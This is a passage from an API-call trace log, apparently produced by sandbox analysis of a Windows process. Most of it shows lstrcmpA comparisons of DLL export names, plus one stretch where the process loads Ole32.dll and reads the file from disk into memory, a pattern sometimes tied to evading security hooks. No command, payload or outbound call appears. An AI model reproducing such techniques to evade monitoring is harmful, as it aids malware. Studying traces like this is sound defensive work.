(lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAInit") returned 1 [0201.038] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAUpdate") returned 1 [0201.038] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AbortSystemShutdownA") returned 1 [0201.038] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AbortSystemShutdownW") returned 1 [0201.038] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheck") returned 1 [0201.038] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0201.038] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0201.038] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByType") returned 1 [0201.038] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0201.038] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0201.038] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultList") returned 1 [0201.038] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0201.039] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0201.039] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 0 [0201.039] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0201.039] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0201.039] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0201.039] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0201.039] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0201.039] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0201.039] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0201.039] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0201.039] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByType") returned 1 [0201.039] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0201.039] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0201.039] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultList") returned 1 [0201.039] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0201.039] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0201.039] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0201.039] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 0 [0201.039] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAFinal") returned 1 [0201.039] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAInit") returned 1 [0201.039] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAUpdate") returned 1 [0201.039] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AbortSystemShutdownA") returned 1 [0201.039] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AbortSystemShutdownW") returned 1 [0201.039] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheck") returned 1 [0201.040] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0201.040] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0201.040] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByType") returned 1 [0201.040] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0201.040] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0201.040] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultList") returned 1 [0201.040] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0201.040] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0201.040] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0201.040] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0201.040] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AddAccessAllowedAce") returned 0 [0201.040] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAFinal") returned 1 [0201.040] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAInit") returned 1 [0201.040] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAUpdate") returned 1 [0201.040] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AbortSystemShutdownA") returned 1 [0201.040] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AbortSystemShutdownW") returned 1 [0201.040] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheck") returned 1 [0201.040] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0201.040] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0201.040] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByType") returned 1 [0201.040] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0201.040] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0201.040] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultList") returned 1 [0201.041] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0201.041] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0201.041] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0201.041] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0201.041] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AddAccessAllowedAce") returned 1 [0201.041] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AddAccessAllowedAceEx") returned 0 [0201.041] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAFinal") returned 1 [0201.041] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAInit") returned 1 [0201.041] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAUpdate") returned 1 [0201.041] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AbortSystemShutdownA") returned 1 [0201.041] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AbortSystemShutdownW") returned 1 [0201.314] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheck") returned 1 [0201.314] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0201.314] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0201.314] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByType") returned 1 [0201.314] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0201.314] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0201.314] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultList") returned 1 [0201.314] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0201.314] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0201.314] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0201.314] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0201.314] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedAce") returned 1 [0201.314] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedAceEx") returned 1 [0201.314] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedObjectAce") returned 0 [0201.314] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAFinal") returned 1 [0201.315] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAInit") returned 1 [0201.315] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAUpdate") returned 1 [0201.315] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AbortSystemShutdownA") returned 1 [0201.315] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AbortSystemShutdownW") returned 1 [0201.315] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheck") returned 1 [0201.315] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0201.315] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0201.315] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByType") returned 1 [0201.315] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0201.315] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0201.315] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultList") returned 1 [0201.315] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0201.315] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0201.315] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0201.315] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0201.315] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedAce") returned 1 [0201.315] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedAceEx") returned 1 [0201.315] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedObjectAce") returned 1 [0201.315] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessDeniedAce") returned 0 [0201.315] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAFinal") returned 1 [0201.315] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAInit") returned 1 [0201.315] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAUpdate") returned 1 [0201.315] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AbortSystemShutdownA") returned 1 [0201.315] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AbortSystemShutdownW") returned 1 [0201.316] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheck") returned 1 [0201.316] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0201.316] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0201.316] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByType") returned 1 [0201.316] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0201.316] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0201.316] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultList") returned 1 [0201.316] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0201.316] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0201.316] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0201.316] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0201.316] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedAce") returned 1 [0201.316] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedAceEx") returned 1 [0201.316] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedObjectAce") returned 1 [0201.316] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessDeniedAce") returned 1 [0201.316] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessDeniedAceEx") returned 0 [0201.316] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAFinal") returned 1 [0201.316] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAInit") returned 1 [0201.317] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAUpdate") returned 1 [0201.317] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AbortSystemShutdownA") returned 1 [0201.317] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AbortSystemShutdownW") returned 1 [0201.317] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheck") returned 1 [0201.317] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0201.317] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0201.317] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByType") returned 1 [0201.317] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0201.317] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0201.317] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultList") returned 1 [0201.317] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0201.317] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0201.317] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0201.317] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0201.317] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedAce") returned 1 [0201.317] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedAceEx") returned 1 [0201.317] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedObjectAce") returned 1 [0201.317] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedAce") returned 1 [0201.317] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedAceEx") returned 1 [0201.317] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedObjectAce") returned 0 [0201.317] lstrcmpA (lpString1="AddAce", lpString2="A_SHAFinal") returned 1 [0201.317] lstrcmpA (lpString1="AddAce", lpString2="A_SHAInit") returned 1 [0202.067] GetProcessHeap () returned 0x570000 [0202.067] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2d42010 | out: hHeap=0x570000) returned 1 [0202.075] GetProcessHeap () returned 0x570000 [0202.075] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5890a0 [0202.075] LoadLibraryA (lpLibFileName="Ole32.dll") returned 0x7ffc5e3e0000 [0202.076] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0202.077] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0202.077] GetModuleFileNameA (in: hModule=0x7ffc5e3e0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")) returned 0x1d [0202.077] CreateFileA (lpFileName="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0202.077] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0202.077] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0202.077] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1322240) returned 1 [0202.077] GetProcessHeap () returned 0x570000 [0202.077] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x142d00) returned 0x4105040 [0202.082] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0202.082] ReadFile (in: hFile=0x140, lpBuffer=0x4105040, nNumberOfBytesToRead=0x142d00, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4105040*, lpNumberOfBytesRead=0x14f5a4*=0x142d00, lpOverlapped=0x0) returned 1 [0202.357] CloseHandle (hObject=0x140) returned 1 [0202.357] lstrcmpA (lpString1="BindMoniker", lpString2="BindMoniker") returned 0 [0202.357] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="BindMoniker") returned 1 [0202.357] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0202.357] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0202.357] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="CLIPFORMAT_UserFreeExt") returned 0 [0202.357] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="BindMoniker") returned 1 [0202.357] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0202.357] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0202.358] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0202.358] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0202.358] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0202.358] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserMarshalExt") returned 0 [0202.358] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="BindMoniker") returned 1 [0202.358] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0202.358] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0202.358] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0202.358] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0202.358] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0202.358] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0202.358] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserSize") returned 1 [0202.358] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserSize64") returned 1 [0202.358] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserSizeExt") returned 0 [0202.358] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="BindMoniker") returned 1 [0202.358] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0202.358] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0202.358] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0202.358] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0202.358] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0202.358] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0202.358] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserSize") returned 1 [0202.359] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserSize64") returned 1 [0202.359] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0202.359] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0202.359] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0202.359] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 0 [0202.359] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="BindMoniker") returned 1 [0202.359] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserFree") returned 1 [0202.359] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserFree64") returned 1 [0202.359] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0202.359] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0202.359] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0202.359] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0202.359] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserSize") returned 1 [0202.359] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserSize64") returned 1 [0202.359] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0202.359] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0202.359] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0202.359] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0202.360] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLSIDFromOle1Class") returned 1 [0202.360] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLSIDFromProgID") returned 1 [0202.360] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLSIDFromProgIDEx") returned 0 [0202.360] lstrcmpA (lpString1="CheckInitDde", lpString2="BindMoniker") returned 1 [0202.360] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserFree") returned -1 [0202.360] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserFree64") returned -1 [0202.360] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserFreeExt") returned -1 [0202.360] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserMarshal") returned -1 [0202.360] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserMarshal64") returned -1 [0202.360] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserMarshalExt") returned -1 [0202.360] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserSize") returned -1 [0202.360] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserSize64") returned -1 [0202.360] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserSizeExt") returned -1 [0202.360] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserUnmarshal") returned -1 [0202.360] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserUnmarshal64") returned -1 [0202.360] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserUnmarshalExt") returned -1 [0202.360] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromOle1Class") returned -1 [0202.361] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromProgID") returned -1 [0202.361] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromProgIDEx") returned -1 [0202.361] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromString") returned -1 [0202.361] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0202.361] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0202.361] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0202.361] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0202.361] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0202.361] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0202.361] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0202.361] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0202.361] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0202.361] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_Connect") returned -1 [0202.361] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0202.361] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0202.361] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0202.361] lstrcmpA (lpString1="CheckInitDde", 